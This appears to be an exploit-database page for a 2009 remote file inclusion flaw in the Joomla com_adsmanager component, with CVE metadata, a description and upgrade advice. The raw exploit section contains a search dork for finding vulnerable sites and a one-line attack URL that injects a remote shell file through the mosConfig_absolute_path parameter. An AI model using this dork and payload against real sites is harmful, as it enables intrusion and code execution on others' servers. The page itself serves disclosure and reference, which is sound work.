header-logo
Suggest Exploit
vendor:
Joomla Component com_adsmanager
by:
AtT4CKxT3rR0r1ST
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Joomla Component com_adsmanager
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: CVE-2009-4010
CPE: o:joomla:joomla
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

Joomla Component com_adsmanager Remote File Include

This vulnerability allows an attacker to include a remote file on the webserver. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'mosConfig_absolute_path' parameter of the 'index.php' script. A remote attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Joomla Component com_adsmanager.
Source

Exploit-DB raw data:

Joomla Component com_adsmanager Remote File Include
==============================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://downloads.ziddu.com/downloadfiles/10982893/com_adsmanager.zip
.:. Dork           : inurl:"com_adsmanager"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?]

####################################################################

Navigation

Suggest Exploit

Services By CQR